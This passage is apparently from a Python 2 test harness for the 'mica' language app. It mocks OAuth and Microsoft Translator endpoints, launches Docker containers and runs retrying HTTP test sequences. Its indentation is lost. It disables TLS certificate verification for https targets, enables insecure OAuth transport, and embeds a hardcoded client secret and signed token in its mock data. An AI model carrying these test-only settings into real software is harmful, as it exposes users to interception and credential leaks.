logger.setLevel(level=DEBUG)
streamhandler = StreamHandler(sys.stderr)
logger.addHandler(streamhandler)
def tlog(*objs):
logger.debug(*objs)
environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'
start_time = int(time())
level = logging.WARN
'''
httplib.HTTPConnection.debuglevel = 2
'''
logging.basicConfig()
logging.getLogger().setLevel(level)
requests_log = logging.getLogger("requests.packages.urllib3")
requests_log.setLevel(DEBUG)
requests_log.propagate = False
requests_oauth_log = logging.getLogger("requests_oauthlib.oauth2_session")
requests_oauth_log.setLevel(WARN)
requests_oauth_log.propagate = False
requests.packages.urllib3.disable_warnings()
cwd = re_compile(".*\/").search(os_path.realpath(__file__)).group(0)
sys.path = [cwd, cwd + "../"] + sys.path
record = open(cwd + "../logs/test.log", 'w')
from params import parameters, test
from common import sdict, recursiveSetInDict, timest, getFromDict
from mica import go
from pyquery import PyQuery as pq
from sys import argv
import couch_adapter
server_port = 9888
target = test["target_proto"] + "://" + test["target"] + ":" + str(test["target_port"])
couch = parameters["couch_proto"] + "://" + parameters["couch_server"] + ":" + str(parameters["couch_port"]) + ((parameters["couch_path"] + "/") if "couch_path" in parameters else "/")
couch_config = parameters["couch_proto"] + "://" + parameters["couch_server"] + ":" + str(test["config_port"]) + ((parameters["couch_path"] + "/") if "couch_path" in parameters else "/")
target_verify = True if test["target_proto"] == "http" else False
couch_verify = True if parameters["couch_proto"] == "http" else False
current_cookie = False
test_timeout = 60
oauth = { "codes" : {}, "states" : {}, "tokens" : {}}
mock_rest = {
"TranslatorAccess" : [ dict(inp = {"client_secret": "fge8PkcT/cF30AcBKOMuU9eDysKN/a7fUqH6Tq3M0W8=", "grant_type": "client_credentials", "client_id": "micalearning", "scope": "http://localhost:" + str(server_port) + "/TranslatorRequest"},
outp = {"token_type": "http://schemas.xmlsoap.org/ws/2009/11/swt-token-profile-1.0", "access_token": "http%3a%2f%2fschemas.xmlsoap.org%2fws%2f2005%2f05%2fidentity%2fclaims%2fnameidentifier=micalearning&http%3a%2f%2fschemas.microsoft.com%2faccesscontrolservice%2f2010%2f07%2fclaims%2fidentityprovider=https%3a%2f%2fdatamarket.accesscontrol.windows.net%2f&Audience=http%3a%2f%2fapi.microsofttranslator.com&ExpiresOn=1448071220&Issuer=https%3a%2f%2fdatamarket.accesscontrol.windows.net%2f&HMACSHA256=p2YmU56ljSJjtcQOpViQaKZ1JpEOZJiCGQJf5otxmpA%3d", "expires_in": "599", "scope": "http://api.microsofttranslator.com"}),
],
"TranslatorRequest" : [
{"outp": [{"TranslatedText": "Baise", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [5]}], "inp": {"texts": "[\"\\u767e\\u8272\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Business", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [8]}], "inp": {"texts": "[\"\\u751f\\u610f\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Centimetre", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [10]}], "inp": {"texts": "[\"\\u5398\\u7c73\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Cheap", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [5]}], "inp": {"texts": "[\"\\u4fbf\\u5b9c\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Collection", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [10]}], "inp": {"texts": "[\"\\u6c47\\u96c6\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Come out", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [8]}], "inp": {"texts": "[\"\\u51fa\\u6765\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Fair", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [4]}], "inp": {"texts": "[\"\\u516c\\u9053\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Family", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [6]}], "inp": {"texts": "[\"\\u4eba\\u5bb6\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Get up", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [6]}], "inp": {"texts": "[\"\\u8d77\\u6765\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Hot", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [3]}, {"TranslatedText": "Inflammation", "From": "zh-CHS", "OriginalTextSentenceLengths": [1], "TranslatedTextSentenceLengths": [12]}, {"TranslatedText": "It's hot", "From": "zh-CHS", "OriginalTextSentenceLengths": [1], "TranslatedTextSentenceLengths": [8]}], "inp": {"texts": "[\"\\u708e\\u70ed\", \"\\u708e\", \"\\u70ed\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "How", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [3]}], "inp": {"texts": "[\"\\u600e\\u4e48\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Husband", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [7]}], "inp": {"texts": "[\"\\u8001\\u516c\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Internet", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [8]}], "inp": {"texts": "[\"\\u7f51\\u7edc\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "King", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [4]}], "inp": {"texts": "[\"\\u5927\\u738b\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Modern", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [6]}], "inp": {"texts": "[\"\\u73b0\\u4ee3\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Nausea", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [6]}], "inp": {"texts": "[\"\\u6076\\u5fc3\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Promise", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [7]}], "inp": {"texts": "[\"\\u51fa\\u606f\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Relationship", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [12]}], "inp": {"texts": "[\"\\u5173\\u7cfb\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Reporting", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [9]}], "inp": {"texts": "[\"\\u6c47\\u62a5\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Review", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [6]}], "inp": {"texts": "[\"\\u590d\\u4e60\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Story", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [5]}], "inp": {"texts": "[\"\\u6545\\u4e8b\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Take care of", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [12]}], "inp": {"texts": "[\"\\u7167\\u5e94\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Things", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [6]}], "inp": {"texts": "[\"\\u4e1c\\u897f\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "View", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [4]}], "inp": {"texts": "[\"\\u8bf4\\u6cd5\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Where", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [5]}], "inp": {"texts": "[\"\\u54ea\\u91cc\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Wonder", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [6]}], "inp": {"texts": "[\"\\u7422\\u78e8\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Woods", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [5]}], "inp": {"texts": "[\"\\u6811\\u6797\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "\u4e08\u592b", "From": "en", "OriginalTextSentenceLengths": [7], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Husband\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp" : [{"TranslatedText": "\u4e0d\u77e5\u9053", "From": "en", "OriginalTextSentenceLengths": [6], "TranslatedTextSentenceLengths": [3]}], "inp": {"texts": "[\"Wonder\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u4e0d\u77e5\u9053", "From": "en", "OriginalTextSentenceLengths": [6], "TranslatedTextSentenceLengths": [3]}], "inp": {"texts": "[\"Wonder\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u4e1a\u52a1", "From": "en", "OriginalTextSentenceLengths": [8], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Business\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u4e8b\u60c5", "From": "en", "OriginalTextSentenceLengths": [6], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Things\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u4e92\u8054\u7f51", "From": "en", "OriginalTextSentenceLengths": [8], "TranslatedTextSentenceLengths": [3]}], "inp": {"texts": "[\"Internet\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u4ece\u524d\u6709\u4e2a\u5c0f\u5b69", "From": "en", "OriginalTextSentenceLengths": [6], "TranslatedTextSentenceLengths": [6]}], "inp": {"texts": "[\"\\u4ece\\u524d\\u6709\\u4e2a\\u5c0f\\u5b69\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u4f0d\u5179", "From": "en", "OriginalTextSentenceLengths": [5], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Woods\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u4fbf\u5b9c", "From": "en", "OriginalTextSentenceLengths": [5], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Cheap\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u516c\u5e73", "From": "en", "OriginalTextSentenceLengths": [4], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Fair\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u5173\u7cfb", "From": "en", "OriginalTextSentenceLengths": [12], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Relationship\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u5398\u7c73", "From": "en", "OriginalTextSentenceLengths": [10], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Centimetre\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u56fd\u738b", "From": "en", "OriginalTextSentenceLengths": [4], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"King\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u5728\u54ea\u91cc", "From": "en", "OriginalTextSentenceLengths": [5], "TranslatedTextSentenceLengths": [3]}], "inp": {"texts": "[\"Where\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u5982\u4f55", "From": "en", "OriginalTextSentenceLengths": [3], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"How\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u5ba1\u67e5", "From": "en", "OriginalTextSentenceLengths": [6], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Review\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u5bb6\u5ead", "From": "en", "OriginalTextSentenceLengths": [6], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Family\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u6076\u5fc3", "From": "en", "OriginalTextSentenceLengths": [6], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Nausea\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u627f\u8bfa", "From": "en", "OriginalTextSentenceLengths": [7], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Promise\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u62a5\u544a", "From": "en", "OriginalTextSentenceLengths": [9], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Reporting\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u6545\u4e8b", "From": "en", "OriginalTextSentenceLengths": [5], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Story\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u6765\u5427", "From": "en", "OriginalTextSentenceLengths": [4], "TranslatedTextSentenceLengths": [2]}, {"TranslatedText": "\u51fa", "From": "en", "OriginalTextSentenceLengths": [3], "TranslatedTextSentenceLengths": [1]}], "inp": {"texts": "[\"Come\", \"out\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u73b0\u4ee3", "From": "en", "OriginalTextSentenceLengths": [6], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Modern\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u767e\u8272", "From": "en", "OriginalTextSentenceLengths": [5], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Baise\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u83b7\u53d6", "From": "en", "OriginalTextSentenceLengths": [3], "TranslatedTextSentenceLengths": [2]}, {"TranslatedText": "\u5411\u4e0a", "From": "en", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Get\", \"up\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u89c6\u56fe", "From": "en", "OriginalTextSentenceLengths": [4], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"View\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u91c7\u53d6", "From": "en", "OriginalTextSentenceLengths": [4], "TranslatedTextSentenceLengths": [2]}, {"TranslatedText": "\u4fdd\u5065", "From": "en", "OriginalTextSentenceLengths": [4], "TranslatedTextSentenceLengths": [2]}, {"TranslatedText": "\u7684", "From": "en", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [1]}], "inp": {"texts": "[\"Take\", \"care\", \"of\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u96c6\u5408", "From": "en", "OriginalTextSentenceLengths": [10], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Collection\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
],
#"" : [dict(inp = , outp = ),],
#"" : [dict(inp = , outp = ),],
}
def my_parse(data) :
url_parameters = {}
parsed_data = parse_qs(data, keep_blank_values=1)
for k, v in parsed_data.iteritems() :
v = v[0] if (isinstance(v, list) and len(v) == 1) else v
url_parameters[k] = v
return url_parameters
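# --- Illustrative sketch (not part of the original test) ---
# my_parse() above wraps parse_qs and flattens single-element value lists, so a
# unique key becomes a plain string while a repeated key stays a list. A small
# made-up example of the resulting shape:
def _my_parse_sketch():
    parsed = my_parse("code=abc&scope=read&scope=write")
    assert parsed["code"] == "abc"                 # single value flattened to a string
    assert parsed["scope"] == ["read", "write"]    # repeated key kept as a list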
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
email_count = 1
def check_mock_data(self, path, url_parameters) :
body = ""
for key in mock_rest.keys() :
if not path.count(key) :
continue
found = False
for pair in mock_rest[key] :
if url_parameters != pair["inp"] :
#tlog(" " + str(url_parameters) + " != " + str(pair["inp"]))
continue
#tlog(" MOCKING: " + key + ": " + str(url_parameters))
found = True
body = json_dumps(pair["outp"])
break
if not found :
tlog(" WARNING. NEVER Seen this input: " + str(url_parameters))
continue
break
return body
def do_POST(self) :
body = ""
url = urlparse(self.path)
url_parameters = my_parse(url.query)
path = url.path.replace("/", "")
length = int(self.headers.getheader('content-length'))
url_parameters.update(my_parse(self.rfile.read(length)))
result = 200
result_msg = "OK"
#tlog(" " + str(path) + ": " + str(url_parameters))
body = sdict(success = True, test_success = True)
if path in parameters["oauth"].keys() :
#tlog(" TOKEN REQUEST from: " + path)
if url_parameters["code"] != oauth["codes"][path] or url_parameters["client_secret"] != parameters["oauth"][path]["client_secret"] :
result = 401
result_msg = "Bad Things"
body = {"error" : "bad things"}
oauth["tokens"][path] = binascii_hexlify(os_urandom(4))
body = sdict(access_token = oauth["tokens"][path], token_type = "Bearer", expires_in = 3597)
else :
body = self.check_mock_data(path, url_parameters)
try:
self.send_response(result, result_msg)
self.send_header('Content-type','text/html')
self.send_header("Content-length", str(len(body)))
self.end_headers()
self.wfile.write(body)
except:
tlog(" Error")
def do_GET(self):
if self.path.endswith(".html"):
#self.path has /index.htm
f = open(curdir + sep + self.path)
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
self.wfile.write("<h1>Device Static Content</h1>")
self.wfile.write(f.read())
f.close()
return
url = urlparse(self.path)
url_parameters = my_parse(url.query)
path = url.path.replace("/", "")
#tlog(" " + str(path) + ": " + str(url_parameters))
result = 200
result_msg = "OK"
body = sdict(success = True, test_success = True)
if path in parameters["oauth"].keys() :
body_dict = {}
if "email_key" in parameters["oauth"][path] and parameters["oauth"][path]["email_key"] :
recursiveSetInDict(body_dict, parameters["oauth"][path]["email_key"].split(","), path + str(MyHandler.email_count) + "@holymother.com")
MyHandler.email_count += 1
if "verified_key" in parameters["oauth"][path] and parameters["oauth"][path]["verified_key"] :
body_dict[parameters["oauth"][path]["verified_key"]] = True
recursiveSetInDict(body_dict, parameters["oauth"][path]["verified_key"].split(","), True)
body = json_dumps(body_dict)
else :
body = self.check_mock_data(path, url_parameters)
self.send_response(result, result_msg)
self.send_header('Content-type', 'html')
self.send_header("Content-length", str(len(body)) )
self.end_headers()
self.wfile.write(body)
class TimeoutServer(BaseHTTPServer.HTTPServer):
def get_request(self):
result = self.socket.accept()
result[0].settimeout(10)
return result
def change_timeout(timeout) :
tlog("Changing timeout to " + str(timeout))
s = requests.Session()
r = s.post(couch_config + "_session", data = {"name" : parameters["admin_user"], "password" : parameters["admin_pass"]}, verify = couch_verify)
if r.status_code not in [200, 201] :
raise Exception("Failed to login for timeout change")
r = s.get(couch_config + "_config", verify = couch_verify)
if r.status_code not in [200, 201] :
raise Exception("Failed to lookup configuration: " + str(r.status_code))
config = r.json()
r = s.put(couch_config + "_config/couch_httpd_auth/timeout", data = "\"" + str(timeout) + "\"", verify = couch_verify)
if r.status_code not in [200, 201] :
raise Exception("Failed to change timeout to " + str(timeout) + " seconds" + ": " + str(r.status_code) + ": " + r.text)
# Old timeout is returned
return r.text
def oauth_responder(httpd_server) :
sa = httpd_server.socket.getsockname()
tlog("Serving HTTP on", sa[0], "port", sa[1], "...")
httpd_server.serve_forever()
def check_port(hostname, port, protocol = "TCP") :
try :
if protocol == "TCP" :
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
elif protocol == "UDP" :
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(5)
sock.connect((hostname, port))
sock.close()
return True
except socket.error, msg :
tlog("Unable to connect to " + protocol + " port " + str(port) + " on host " + hostname + " => " + str(msg))
sock.close()
sock = None
return False
def cleanup(name) :
try :
details = c.inspect_container(name)
if details["State"]["Running"] :
tlog("Stopping: " + name)
c.kill(name)
tlog("Removing: " + name)
c.remove_container(name)
except docker.errors.NotFound, e :
tlog("No container to cleanup: " + name)
def move_data_to_url(url) :
temp_url = url["loc"]
first = True
if "data" in url :
for key in url["data"].keys() :
temp_url += ("&" if not first else "?" ) + key + "=" + str(url["data"][key])
if first :
first = False
return temp_url
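# --- Illustrative sketch (not part of the original test) ---
# move_data_to_url() above folds a test entry's "data" dict into the query
# string of its "loc", so GET tests carry the same parameters a POST would send
# in its body. A made-up example of the shape it produces:
def _move_data_to_url_sketch():
    assert move_data_to_url({"loc": "/api", "data": {"human": 0}}) == "/api?human=0"
    # entries without "data" pass through untouched
    assert move_data_to_url({"loc": "/api?human=0&alien=home"}) == "/api?human=0&alien=home"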
def flatten(head_url) :
flat_urls = []
if isinstance(head_url, list) :
for sub_url in head_url :
flat_urls.append(sub_url)
else :
flat_urls.append(head_url)
return flat_urls
def repopulate_states() :
r = s.get(target + "/disconnect", verify = target_verify)
assert(r.status_code == 200)
td = pq(r.text)
for who in parameters["oauth"].keys() :
if who == "redirect" :
continue
for part in td("#oauth_" + who).attr("href").split("&") :
if part.count("state") :
oauth["states"][who] = part.split("=")[1]
break
def run_tests(test_urls) :
global current_cookie
test_urls = deepcopy(test_urls)
# Flatten the nested test groups into a single list of tests
flat_urls = []
for head_url in test_urls :
flatcount = 1
if "repeat" in head_url :
for x in range(0, head_url["repeat"]) :
for sub_url in flatten(head_url["urls"]) :
flat_urls += flatten(sub_url)
else :
flat_urls += flatten(head_url)
tlog("Tests: " + str(len(flat_urls)))
stop_test = False
last_json = {}
try:
for tidx in range(0, len(flat_urls)) :
url = flat_urls[tidx]
if "stop" in url and url["stop"] :
tlog("Stop requested.")
stop_test = True
break
start = timest()
job_was_running = False
if "data" in url :
fkeys = ["uuid"] if "upload" not in url else []
if "forward_keys" in url :
for key in url["forward_keys"] :
if key not in fkeys :
fkeys.append(key)
for key in fkeys :
dest_key = key
if key.count("/") :
dest_key = key.split("/")[1]
key = key.split("/")[0]
if key in last_json and key not in url["data"] :
if key != "uuid" :
tlog(" Updating key " + str(dest_key) + " in data with value: " + last_json[key])
url["data"][dest_key] = last_json[key]
finaldest = target if ("couch" not in url or not url["couch"]) else couch
verify = target_verify if ("couch" not in url or not url["couch"]) else couch_verify
secs = int(time()) - start_time
tlogmsg = "Test (@" + str(secs) + ") " + str(tidx) + "/" + str(len(flat_urls)) + ": " + url["method"].upper() + ": " + (url["loc"].replace("/api?human=0&alien=", "").replace("&", ", ").replace("=", " = ").replace("&", ", ") if "loc" in url else "nowhere") + ", data: " + (str(url["data"]) if "data" in url else "none")
max_retries = 5
retry_attempts = 0
until_attempts = 0
while retry_attempts < max_retries and until_attempts < 30 :
cookie_found = False
tlog(tlogmsg)
record.write(tlogmsg + "\n")
record.flush()
if "sleep" in url :
tlog(" Sleeping for " + str(url["sleep"]) + " seconds...")
sleep(url["sleep"])
break
if url["loc"].count("state=") and url["loc"].count("finish=") :
[left, right] = url["loc"].split("?")
oparams = my_parse(right)
if oparams["state"] != oauth["states"][oparams["alien"]] :
#tlog(" State is stale. correcting.")
oparams["state"] = oauth["states"][oparams["alien"]]
url["loc"] = left + "?" + urlencode(oparams)
if url["method"] == "get" :
udest = finaldest + move_data_to_url(url)
r = s.get(udest, verify = verify, cookies = dict(AuthSession = current_cookie) if current_cookie else {})
elif url["method"] == "post" :
udest = finaldest + url["loc"]
pdata = deepcopy(url["data"])
if current_cookie :
pdata["Cookie"] = "AuthSession=" + current_cookie
r = s.post(udest, data = pdata, verify = verify)
elif url["method"] == "put" :
headers = {}
if current_cookie :
headers["Cookie"] = "AuthSession=" + current_cookie
if "upload" in url :
fname = cwd + 'example_stories/' + url["upload"]
tlog(" Uploading file: " + fname)
udest = finaldest + move_data_to_url(url)
headers['content-type'] = url["upload_type"]
r = s.put(udest, headers = headers, data = open(fname, 'rb').read(), verify = verify)
else :
udest = finaldest + url["loc"]
r = s.put(udest, headers = headers, data = json_dumps(url["data"]), verify = verify)
stop = timest()
if 'AuthSession' in r.cookies :
current_cookie = r.cookies['AuthSession']
#tlog(" Setting cookie: " + current_cookie)
cookie_found = True
if r.status_code not in [200, 201] :
if r.status_code == 504 :
tlog(" Gateway timeout to: " + udest + ", Try the request again...")
retry_attempts += 1
run_tests(common_urls["relogin"])
sleep(5)
continue
if r.status_code == 401 :
tlog(" Our token may have expired. Login again and retry the test: " + str(r.text))
# For auth tests, 401 means the oauth state parameter
# is no longer valid. We have to update it.
if url["loc"].count("state=") and url["loc"].count("finish=") :
#tlog("Repopulating oauth state value...")
repopulate_states()
if "retry_action" in url :
run_tests(common_urls[url["retry_action"]])
else :
run_tests(common_urls["relogin"])
retry_attempts += 1
sleep(5)
continue
tlog(" Bad status code: " + str(r.status_code) + ": " + r.text)
assert(False)
else :
#tlog(" Resetting all attempts to zero.")
retry_attempts = 0
until_attempts = 0
# The difference between 'success' and 'test_success' is for errors
# that happen during tests which are tolerable in the user experience.
# For example, if the translation API can't reach the internet, the
# UI will just return that connectivity information to the user, but
# it does not mean there's a failure in the system. But, it is indeed
# a unit test failure, so we need to know about it and check for it.
try :
j = json_loads(r.text)
last_json = j
if "cookie" in j and not cookie_found :
current_cookie = j["cookie"].split("=")[1]
tlog(" using json cookie: " + current_cookie)
except ValueError, e :
tlog(" Failed to parse JSON from:\n" + r.text)
#tlog(" Failed to parse JSON.")
assert(False)
#retry_attempts += 1
#sleep(5)
#continue
if "job_running" in j and j["job_running"] and ("check_job_running" not in url or url["check_job_running"]):
#if not job_was_running :
tlog(" There is a job running. Coming back later.")
job_was_running = True
sleep(5)
continue
if "until" in url :
v = getFromDict(j, url["until"]["path"])
if v != url["until"]["equals"] :
tlog(" Until " + str(v) + " != " + url["until"]["equals"])
sleep(5)
until_attempts += 1
continue
diff = stop - start
#tlog(" Time: " + str(int(diff)) + " secs.")
if "success" in url and url["success"] is not None :
assert("success" in j)
if j["success"] != url["success"] :
tlog("resulting JSON: " + str(j))
tlog("Success failed. Requested: " + str(url["success"]) + ", Got: " + str(j["success"]))
assert(False)
if "test_success" in url and url["test_success"] is not None :
assert("test_success" in j)
if j["test_success"] != url["test_success"] :
tlog("resulting JSON: " + str(j))
tlog(" Test Success failed. Requested: " + str(url["test_success"]) + ", Got: " + str(j["test_success"]))
assert(False)
break
if retry_attempts >= max_retries :
tlog(" Failed to retry last run after 3 attempts.")
stop_test = True
assert(False)
if until_attempts >= 30 :
tlog(" Failed to until last run after 30 attempts.")
stop_test = True
assert(False)
except KeyboardInterrupt:
tlog("CTRL-C interrupt")
return stop_test
c = Client(base_url = test["docker_base_url"], version = test["docker_api_version"])
s = requests.Session()
options = []
if test["start_jabber"] :
options.append(
dict(
image = test["jabber_container"],
command = ["/bin/bash", "-c", "(/home/mrhines/mica/restart.sh &); bash"],
hostname = 'jabber',
name = test["jabber_name"],
tty = True,
ports = [5280, 22, 5222, 5223, 5281],
host_config = c.create_host_config(port_bindings = {
"22/tcp": ("0.0.0.0", 4444),
"5222/tcp": ("0.0.0.0", 5222),
"5223/tcp": ("0.0.0.0", 5223),
"5280/tcp": ("0.0.0.0", 5280),
"5281/tcp": ("0.0.0.0", 5281),
})
)
)
fh = open(cwd + "../params.py")
raw_params = fh.read()
fh.close()
options.append(
dict(
image = test["couch_container"],
command = ["/bin/bash", "-c", "cd /home/mrhines/mica/; git pull; (/home/mrhines/mica/restart.sh &); bash"],
name = test["couch_name"],
tty = True,
ports = [5984, 22, 5986],
volumes = [ "/var/log/" ],
environment = dict(CUSER = test["username"], CPASS = test["password"], CPARAMS = raw_params),
host_config = c.create_host_config(port_bindings = {
"5984/tcp": ("0.0.0.0", 5985),
"5986/tcp": ("0.0.0.0", 5986),
"22/tcp": ("0.0.0.0", 6222),
}, binds = [
cwd + "../logs:/var/log/",
]
)
)
)
def wait_for_port_ready(name, proto, hostname, port) :
targ = proto + "://" + hostname
tlog("Checking " + hostname + ":" + str(port))
while True :
if check_port(hostname, port) :
try :
r = s.get(targ + ":" + str(port), verify = True if proto == "http" else False)
tlog("Container " + name + " ready.")
break
except requests.exceptions.ConnectionError, e :
tlog("Container " + name + " not ready: " + str(e) + ". Waiting...")
else :
tlog("Port not open yet. Waiting...")
sleep(1)
tlog("Check complete.")
for option in options :
cleanup(option["name"])
